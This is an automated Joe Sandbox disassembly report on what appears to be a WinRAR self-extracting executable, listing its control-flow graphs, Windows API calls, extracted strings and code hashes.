                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                • String ID: PNG
                                • API String ID: 4097654274-364855578
                                • Opcode ID: 739fde0bd6a1adfd73453e8ed0c7e6b660c27e361775969de5768bc99d5c5587
                                • Instruction ID: c997053687efb7e2a6fd40bbd5b0be11adaf3b8c3e531b1627012d28e2a36ba3
                                • Opcode Fuzzy Hash: 739fde0bd6a1adfd73453e8ed0c7e6b660c27e361775969de5768bc99d5c5587
                                • Instruction Fuzzy Hash: 98316172204706AFC7109F61DC58D2BFBA9FF85751B088519F90AD2361EB31DD009AB1

                                Control-flow Graph

                                control_flow_graph 971 d6a5f4-d6a61f call d7e360 974 d6a691-d6a69a FindNextFileW 971->974 975 d6a621-d6a632 FindFirstFileW 971->975 978 d6a6b0-d6a6b2 974->978 979 d6a69c-d6a6aa GetLastError 974->979 976 d6a6b8-d6a75c call d6fe56 call d6bcfb call d70e19 * 3 975->976 977 d6a638-d6a64f call d6b66c 975->977 982 d6a761-d6a774 976->982 986 d6a651-d6a668 FindFirstFileW 977->986 987 d6a66a-d6a673 GetLastError 977->987 978->976 978->982 979->978 986->976 986->987 989 d6a684 987->989 990 d6a675-d6a678 987->990 993 d6a686-d6a68c 989->993 990->989 992 d6a67a-d6a67d 990->992 992->989 995 d6a67f-d6a682 992->995 993->982 995->993
                                APIs
                                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A628
                                • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A65E
                                • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A66A
                                • FindNextFileW.KERNEL32(?,?,?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A692
                                • GetLastError.KERNEL32(?,?,?,?,00D6A4EF,000000FF,?,?), ref: 00D6A69E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: FileFind$ErrorFirstLast$Next
                                • String ID:
                                • API String ID: 869497890-0
                                • Opcode ID: c749cf721597706053dc7859444f6a17afcc08c39abe562c6455ba722cc49844
                                • Instruction ID: ddc99282034ddc0b3c8bed9f1d8de0faaa1d0db1a2998b649817093dbe4ae0b6
                                • Opcode Fuzzy Hash: c749cf721597706053dc7859444f6a17afcc08c39abe562c6455ba722cc49844
                                • Instruction Fuzzy Hash: DA415E72504641AFC324EF68C884ADAF7E8FF48354F084A2AF5D9D3250D774A9648FB2
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,?,00D87513,00000000,00D9BAD8,0000000C,00D8766A,00000000,00000002,00000000), ref: 00D8755E
                                • TerminateProcess.KERNEL32(00000000,?,00D87513,00000000,00D9BAD8,0000000C,00D8766A,00000000,00000002,00000000), ref: 00D87565
                                • ExitProcess.KERNEL32 ref: 00D87577
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID:
                                • API String ID: 1703294689-0
                                • Opcode ID: 0a2d8ff0094312e259a525bdf9b7475f12b121dc5d6b2e3f65e3b8374754b479
                                • Instruction ID: 8513493584ce56ae4766a79ca4ba43cda318a3e2f919be6e1904e36880f7149f
                                • Opcode Fuzzy Hash: 0a2d8ff0094312e259a525bdf9b7475f12b121dc5d6b2e3f65e3b8374754b479
                                • Instruction Fuzzy Hash: 7CE0B635004648ABCF11BF68DD09A497B69EB40745F248455F9099A232CB35DE42CB70
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prolog_memcmp
                                • String ID:
                                • API String ID: 3004599000-0
                                • Opcode ID: 1e8d2c72c224d3f93d7f419326a9affa63771adcacdda08e12112670b199dd97
                                • Instruction ID: c2d5bb96863db2fddc22103fc6ddecd18d7d2b2de394f3a159e86d75b330b531
                                • Opcode Fuzzy Hash: 1e8d2c72c224d3f93d7f419326a9affa63771adcacdda08e12112670b199dd97
                                • Instruction Fuzzy Hash: 03823A70904245AFDF25CF64C895BFABBB9EF15300F0C42BAE959AB142DB315A48DB70
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D7AEE5
                                  • Part of subcall function 00D6130B: GetDlgItem.USER32(00000000,00003021), ref: 00D6134F
                                  • Part of subcall function 00D6130B: SetWindowTextW.USER32(00000000,00D935B4), ref: 00D61365
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: H_prologItemTextWindow
                                • String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                • API String ID: 810644672-8108337
                                • Opcode ID: f0262b2b2555b69cdc3234d29dc7d1fe142e051510eb241198f3f8178c4ed03c
                                • Instruction ID: 14a32b03595e604df98e7bdffeb955e2fd2abe8e685ed61dde2474a5504028b9
                                • Opcode Fuzzy Hash: f0262b2b2555b69cdc3234d29dc7d1fe142e051510eb241198f3f8178c4ed03c
                                • Instruction Fuzzy Hash: D5420570904345AFEB21ABA09C4AFBE7B7DEB06710F048156F649E62D1EBB44D44DB32

                                Control-flow Graph

                                control_flow_graph 257 d700cf-d700ee call d7e360 GetModuleHandleW 260 d70154-d703b2 257->260 261 d700f0-d70107 GetProcAddress 257->261 262 d70484-d704b3 GetModuleFileNameW call d6bc85 call d6fe56 260->262 263 d703b8-d703c3 call d870dd 260->263 264 d70121-d70131 GetProcAddress 261->264 265 d70109-d7011f 261->265 279 d704b5-d704bf call d6acf5 262->279 263->262 274 d703c9-d703fa GetModuleFileNameW CreateFileW 263->274 264->260 266 d70133-d70152 264->266 265->264 266->260 276 d703fc-d7040a SetFilePointer 274->276 277 d70478-d7047f CloseHandle 274->277 276->277 280 d7040c-d70429 ReadFile 276->280 277->262 286 d704c1-d704c5 call d70085 279->286 287 d704cc 279->287 280->277 282 d7042b-d70450 280->282 284 d7046d-d70476 call d6fbd8 282->284 284->277 293 d70452-d7046c call d70085 284->293 294 d704ca 286->294 288 d704ce-d704d0 287->288 291 d704f2-d70518 call d6bcfb GetFileAttributesW 288->291 292 d704d2-d704f0 CompareStringW 288->292 295 d7051a-d7051e 291->295 301 d70522 291->301 292->291 292->295 293->284 294->288 295->279 300 d70520 295->300 302 d70526-d70528 300->302 301->302 303 d70560-d70562 302->303 304 d7052a 302->304 305 d7066f-d70679 303->305 306 d70568-d7057f call d6bccf call d6acf5 303->306 307 d7052c-d70552 call d6bcfb GetFileAttributesW 304->307 317 d705e7-d7061a call d6400a AllocConsole 306->317 318 d70581-d705e2 call d70085 * 2 call d6ddd1 call d6400a call d6ddd1 call d79f35 306->318 313 d70554-d70558 307->313 314 d7055c 307->314 313->307 316 d7055a 313->316 314->303 316->303 323 d70667-d70669 ExitProcess 317->323 324 d7061c-d70661 GetCurrentProcessId AttachConsole call d835b3 GetStdHandle WriteConsoleW Sleep FreeConsole 317->324 318->323 324->323
                                APIs
                                • GetModuleHandleW.KERNEL32(kernel32), ref: 00D700E4
                                • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D700F6
                                • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D70127
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D703D4
                                • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D703F0
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D70402
                                • ReadFile.KERNEL32(00000000,?,00007FFE,00D93BA4,00000000), ref: 00D70421
                                • CloseHandle.KERNEL32(00000000), ref: 00D70479
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00D7048F
                                • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00D704E7
                                • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 00D70510
                                • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00D7054A
                                  • Part of subcall function 00D70085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D700A0
                                  • Part of subcall function 00D70085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D6EB86,Crypt32.dll,00000000,00D6EC0A,?,?,00D6EBEC,?,?,?), ref: 00D700C2
                                • _swprintf.LIBCMT ref: 00D705BE
                                • _swprintf.LIBCMT ref: 00D7060A
                                  • Part of subcall function 00D6400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D6401D
                                • AllocConsole.KERNEL32 ref: 00D70612
                                • GetCurrentProcessId.KERNEL32 ref: 00D7061C
                                • AttachConsole.KERNEL32(00000000), ref: 00D70623
                                • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00D70649
                                • WriteConsoleW.KERNEL32(00000000), ref: 00D70650
                                • Sleep.KERNEL32(00002710), ref: 00D7065B
                                • FreeConsole.KERNEL32 ref: 00D70661
                                • ExitProcess.KERNEL32 ref: 00D70669
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                • API String ID: 1201351596-3298887752
                                • Opcode ID: dc8939a99cbd915353c8acb3c6529678af04c28ac4c0dcc07bf4c0fbf8d533d5
                                • Instruction ID: 3268a430e0e20869bc9bacf7909711312be4474e19cd2eb238f2f94b612a43e5
                                • Opcode Fuzzy Hash: dc8939a99cbd915353c8acb3c6529678af04c28ac4c0dcc07bf4c0fbf8d533d5
                                • Instruction Fuzzy Hash: 36D13FB1508384EBDB309F50D849B9FBBE8EF85704F54491DF68D96390DBB08A498B72

                                Control-flow Graph

                                control_flow_graph 406 d7bdf5-d7be0d call d7e28c call d7e360 411 d7be13-d7be3d call d7aa36 406->411 412 d7ca90-d7ca9d 406->412 411->412 415 d7be43-d7be48 411->415 416 d7be49-d7be57 415->416 417 d7be58-d7be6d call d7a6c7 416->417 420 d7be6f 417->420 421 d7be71-d7be86 call d717ac 420->421 424 d7be93-d7be96 421->424 425 d7be88-d7be8c 421->425 427 d7ca5c-d7ca87 call d7aa36 424->427 428 d7be9c 424->428 425->421 426 d7be8e 425->426 426->427 427->416 442 d7ca8d-d7ca8f 427->442 430 d7c115-d7c117 428->430 431 d7c074-d7c076 428->431 432 d7bea3-d7bea6 428->432 433 d7c132-d7c134 428->433 430->427 436 d7c11d-d7c12d SetWindowTextW 430->436 431->427 438 d7c07c-d7c088 431->438 432->427 434 d7beac-d7bf06 call d79da4 call d6b965 call d6a49d call d6a5d7 call d670bf 432->434 433->427 437 d7c13a-d7c141 433->437 495 d7c045-d7c05a call d6a52a 434->495 436->427 437->427 443 d7c147-d7c160 437->443 439 d7c09c-d7c0a1 438->439 440 d7c08a-d7c09b call d87168 438->440 446 d7c0a3-d7c0a9 439->446 447 d7c0ab-d7c0b6 call d7ab9a 439->447 440->439 442->412 448 d7c162 443->448 449 d7c168-d7c176 call d835b3 443->449 453 d7c0bb-d7c0bd 446->453 447->453 448->449 449->427 460 d7c17c-d7c185 449->460 458 d7c0bf-d7c0c6 call d835b3 453->458 459 d7c0c8-d7c0e8 call d835b3 call d835de 453->459 458->459 480 d7c101-d7c103 459->480 481 d7c0ea-d7c0f1 459->481 464 d7c187-d7c18b 460->464 465 d7c1ae-d7c1b1 460->465 464->465 469 d7c18d-d7c195 464->469 471 d7c1b7-d7c1ba 465->471 472 d7c296-d7c2a4 call d6fe56 465->472 469->427 476 d7c19b-d7c1a9 call d6fe56 469->476 478 d7c1c7-d7c1e2 471->478 479 d7c1bc-d7c1c1 471->479 488 d7c2a6-d7c2ba call d817cb 472->488 476->488 496 d7c1e4-d7c21e 478->496 497 d7c22c-d7c233 478->497 479->472 479->478 480->427 487 d7c109-d7c110 call d835ce 480->487 485 d7c0f3-d7c0f5 481->485 486 d7c0f8-d7c100 call d87168 481->486 485->486 486->480 487->427 506 d7c2c7-d7c318 call d6fe56 call d7a8d0 GetDlgItem SetWindowTextW SendMessageW call d835e9 488->506 507 d7c2bc-d7c2c0 488->507 512 d7c060-d7c06f call d6a4b3 495->512 513 d7bf0b-d7bf1f SetFileAttributesW 495->513 525 d7c222-d7c224 496->525 526 d7c220 496->526 499 d7c235-d7c24d call d835b3 497->499 500 d7c261-d7c284 call d835b3 * 2 497->500 499->500 517 d7c24f-d7c25c call d6fe2e 499->517 500->488 533 d7c286-d7c294 call d6fe2e 500->533 540 d7c31d-d7c321 506->540 507->506 511 d7c2c2-d7c2c4 507->511 511->506 512->427 519 d7bfc5-d7bfd5 GetFileAttributesW 513->519 520 d7bf25-d7bf58 call d6b4f7 call d6b207 call d835b3 513->520 517->500 519->495 523 d7bfd7-d7bfe6 DeleteFileW 519->523 549 d7bf6b-d7bf79 call d6b925 520->549 550 d7bf5a-d7bf69 call d835b3 520->550 523->495 532 d7bfe8-d7bfeb 523->532 525->497 526->525 536 d7bfef-d7c01b call d6400a GetFileAttributesW 532->536 533->488 547 d7bfed-d7bfee 536->547 548 d7c01d-d7c033 MoveFileW 536->548 540->427 544 d7c327-d7c33b SendMessageW 540->544 544->427 547->536 548->495 551 d7c035-d7c03f MoveFileExW 548->551 549->512 556 d7bf7f-d7bfbe call d835b3 call d7f350 549->556 550->549 550->556 551->495 556->519
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D7BDFA
                                  • Part of subcall function 00D7AA36: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00D7AAFE
                                • SetWindowTextW.USER32(?,?), ref: 00D7C127
                                • _wcsrchr.LIBVCRUNTIME ref: 00D7C2B1
                                • GetDlgItem.USER32(?,00000066), ref: 00D7C2EC
                                • SetWindowTextW.USER32(00000000,?), ref: 00D7C2FC
                                • SendMessageW.USER32(00000000,00000143,00000000,00DAA472), ref: 00D7C30A
                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00D7C335
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                • API String ID: 3564274579-312220925
                                • Opcode ID: 40857879e18f360ede30e6d781a7af194669d6d13ec3c117d3df526f59addd4a
                                • Instruction ID: d52dd1e32aee301892ae5d0de0771bcca8428c226819231c9676bed654bc8699
                                • Opcode Fuzzy Hash: 40857879e18f360ede30e6d781a7af194669d6d13ec3c117d3df526f59addd4a
                                • Instruction Fuzzy Hash: C5E14E72D00619AEDB25EBA4DC45EEE777CEF08711F1481AAF909E2151FB709A848B70

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 561 d6d341-d6d378 call d7e28c call d7e360 call d815e8 568 d6d37a-d6d3a9 GetModuleFileNameW call d6bc85 call d6fe2e 561->568 569 d6d3ab-d6d3b4 call d6fe56 561->569 573 d6d3b9-d6d3dd call d69619 call d699b0 568->573 569->573 580 d6d3e3-d6d3eb 573->580 581 d6d7a0-d6d7a6 call d69653 573->581 583 d6d3ed-d6d405 call d73781 * 2 580->583 584 d6d409-d6d438 call d85a90 * 2 580->584 587 d6d7ab-d6d7bb 581->587 594 d6d407 583->594 595 d6d43b-d6d43e 584->595 594->584 596 d6d444-d6d44a call d69e40 595->596 597 d6d56c-d6d58f call d69d30 call d835d3 595->597 601 d6d44f-d6d476 call d69bf0 596->601 597->581 608 d6d595-d6d5b0 call d69bf0 597->608 606 d6d535-d6d538 601->606 607 d6d47c-d6d484 601->607 612 d6d53b-d6d55d call d69d30 606->612 610 d6d486-d6d48e 607->610 611 d6d4af-d6d4ba 607->611 618 d6d5b2-d6d5b7 608->618 619 d6d5b9-d6d5cc call d835d3 608->619 610->611 614 d6d490-d6d4aa call d85ec0 610->614 615 d6d4e5-d6d4ed 611->615 616 d6d4bc-d6d4c8 611->616 612->595 630 d6d563-d6d566 612->630 633 d6d4ac 614->633 634 d6d52b-d6d533 614->634 623 d6d4ef-d6d4f7 615->623 624 d6d519-d6d51d 615->624 616->615 621 d6d4ca-d6d4cf 616->621 626 d6d5f1-d6d5f8 618->626 619->581 640 d6d5d2-d6d5ee call d7137a call d835ce 619->640 621->615 629 d6d4d1-d6d4e3 call d85808 621->629 623->624 631 d6d4f9-d6d513 call d85ec0 623->631 624->606 625 d6d51f-d6d522 624->625 625->607 636 d6d5fc-d6d625 call d6fdfb call d835d3 626->636 637 d6d5fa 626->637 629->615 644 d6d527 629->644 630->581 630->597 631->581 631->624 633->611 634->612 650 d6d627-d6d62e call d835ce 636->650 651 d6d633-d6d649 636->651 637->636 640->626 644->634 650->581 654 d6d731-d6d757 call d6ce72 call d835ce * 2 651->654 655 d6d64f-d6d65d 651->655 689 d6d771-d6d79d call d85a90 * 2 654->689 690 d6d759-d6d76f call d73781 * 2 654->690 657 d6d664-d6d669 655->657 659 d6d66f-d6d678 657->659 660 d6d97c-d6d984 657->660 662 d6d684-d6d68b 659->662 663 d6d67a-d6d67e 659->663 664 d6d98a-d6d98e 660->664 665 d6d72b-d6d72e 660->665 667 d6d880-d6d891 call d6fcbf 662->667 668 d6d691-d6d6b6 662->668 663->660 663->662 669 d6d990-d6d996 664->669 670 d6d9de-d6d9e4 664->670 665->654 691 d6d976-d6d979 667->691 692 d6d897-d6d8c0 call d6fe56 call d85885 667->692 676 d6d6b9-d6d6de call d835b3 call d85808 668->676 677 d6d722-d6d725 669->677 678 d6d99c-d6d9a3 669->678 674 d6d9e6-d6d9ec 670->674 675 d6da0a-d6da2a call d6ce72 670->675 674->675 681 d6d9ee-d6d9f4 674->681 696 d6da02-d6da05 675->696 709 d6d6f6 676->709 710 d6d6e0-d6d6ea 676->710 677->657 677->665 684 d6d9a5-d6d9a8 678->684 685 d6d9ca 678->685 681->677 694 d6d9fa-d6da01 681->694 687 d6d9c6-d6d9c8 684->687 688 d6d9aa-d6d9ad 684->688 693 d6d9cc-d6d9d9 685->693 687->693 697 d6d9c2-d6d9c4 688->697 698 d6d9af-d6d9b2 688->698 689->581 690->689 691->660 692->691 721 d6d8c6-d6d93c call d71596 call d6fdfb call d6fdd4 call d6fdfb call d858d9 692->721 693->677 694->696 697->693 704 d6d9b4-d6d9b8 698->704 705 d6d9be-d6d9c0 698->705 704->681 711 d6d9ba-d6d9bc 704->711 705->693 716 d6d6f9-d6d6fd 709->716 710->709 715 d6d6ec-d6d6f4 710->715 711->693 715->716 716->676 720 d6d6ff-d6d706 716->720 722 d6d7be-d6d7c1 720->722 723 d6d70c-d6d71a call d6fdfb 720->723 754 d6d93e-d6d947 721->754 755 d6d94a-d6d95f 721->755 722->667 725 d6d7c7-d6d7ce 722->725 730 d6d71f 723->730 728 d6d7d6-d6d7d7 725->728 729 d6d7d0-d6d7d4 725->729 728->725 729->728 732 d6d7d9-d6d7e7 729->732 730->677 734 d6d808-d6d830 call d71596 732->734 735 d6d7e9-d6d7ec 732->735 744 d6d832-d6d84e call d835e9 734->744 745 d6d853-d6d85b 734->745 738 d6d805 735->738 739 d6d7ee-d6d803 735->739 738->734 739->735 739->738 744->730 748 d6d862-d6d87b call d6dd6b 745->748 749 d6d85d 745->749 748->730 749->748 754->755 756 d6d960-d6d967 755->756 757 d6d973-d6d974 756->757 758 d6d969-d6d96d 756->758 757->756 758->730 758->757
                                APIs
                                • __EH_prolog.LIBCMT ref: 00D6D346
                                • _wcschr.LIBVCRUNTIME ref: 00D6D367
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00D6D328,?), ref: 00D6D382
                                • __fprintf_l.LIBCMT ref: 00D6D873
                                  • Part of subcall function 00D7137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00D6B652,00000000,?,?,?,0001042C), ref: 00D71396
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                                • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a
                                • API String ID: 4184910265-980926923
                                • Opcode ID: 70151af9d4c8a5caf6892876ef242fda5023aec5af815e069b6ac16af000ae9f
                                • Instruction ID: c8987b523e37a1ebfdb5b91b8e2a57bd35fff0eb79e5042dd048b9cba4aff1e6
                                • Opcode Fuzzy Hash: 70151af9d4c8a5caf6892876ef242fda5023aec5af815e069b6ac16af000ae9f
                                • Instruction Fuzzy Hash: 7112A271E002199FDF24EFA4EC81BEEB7B6EF04704F14456AE546A7291EB709A44CB70

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00D7AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D7AC85
                                  • Part of subcall function 00D7AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D7AC96
                                  • Part of subcall function 00D7AC74: IsDialogMessageW.USER32(0001042C,?), ref: 00D7ACAA
                                  • Part of subcall function 00D7AC74: TranslateMessage.USER32(?), ref: 00D7ACB8
                                  • Part of subcall function 00D7AC74: DispatchMessageW.USER32(?), ref: 00D7ACC2
                                • GetDlgItem.USER32(00000068,00DBECB0), ref: 00D7CB6E
                                • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00D7A632,00000001,?,?,00D7AECB,00D94F88,00DBECB0), ref: 00D7CB96
                                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D7CBA1
                                • SendMessageW.USER32(00000000,000000C2,00000000,00D935B4), ref: 00D7CBAF
                                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D7CBC5
                                • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D7CBDF
                                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D7CC23
                                • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D7CC31
                                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D7CC40
                                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D7CC67
                                • SendMessageW.USER32(00000000,000000C2,00000000,00D9431C), ref: 00D7CC76
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                • String ID: \
                                • API String ID: 3569833718-2967466578
                                • Opcode ID: 23dbde3b440688cc713525f56f0fcf9a32981865d3ac0438f3c077c76f4034ff
                                • Instruction ID: 1fef7ec4b9dfd8f607a8d9572e6a2a52af32468bf3dd1ec46a3f92a2a4d13273
                                • Opcode Fuzzy Hash: 23dbde3b440688cc713525f56f0fcf9a32981865d3ac0438f3c077c76f4034ff
